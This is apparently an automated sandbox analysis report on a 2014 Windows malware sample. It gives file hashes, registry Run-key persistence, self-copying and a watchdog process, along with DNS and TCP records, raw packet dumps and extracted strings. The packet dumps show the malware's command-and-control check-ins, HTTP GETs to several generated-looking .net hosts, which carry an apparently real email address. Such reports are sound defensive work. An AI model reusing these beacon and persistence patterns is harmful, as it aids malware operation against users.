Analysis Date2014-09-19 03:22:43

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 646f5dd778d4a967d724d543323cfb66 sha1: 1f0e6d1afab4ad1011cc0fe9e9050b2ae909f8e6 size: 291328
Section.rdata md5: b5602a3674d8942eef917e3ebae64243 sha1: feea15ecba6bbbe7b09651cd3f1b8fabd941329b size: 35328 md5: 35b48f0bbb4a98491aaaefd780e08780 sha1: 8ea9cf5523dad481cc8984420fe1e3f0c0a6e669 size: 99328
Timestamp2014-07-24 05:00:01
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Policy Storage PC Bus Browser Virtual ➝
C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe

↳ C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.tocfo
Creates FileC:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\hftmfoevwg.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 68696e6b 6265796f   .Host: thinkbeyo
0x00000070 (00112)   6e642e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 72657365 6e746265   .Host: presentbe
0x00000070 (00112)   696e672e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 68696566 6265696e   .Host: chiefbein
0x00000070 (00112)   672e6e65 740d0a0d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 77656c76 65666f72   .Host: twelvefor
0x00000070 (00112)   65766572 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2068 6973746f 7279666f   .Host: historyfo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 65617468 6572666f   .Host: weatherfo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 6c617373 6265796f   .Host: classbeyo
0x00000070 (00112)   6e642e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 68696e6b 666c6f77   .Host: thinkflow
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 72657365 6e74666c   .Host: presentfl
0x00000070 (00112)   6f776572 2e6e6574 0d0a0d0a 0a

00-+ CC
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
as0 ye
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j~h :E
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
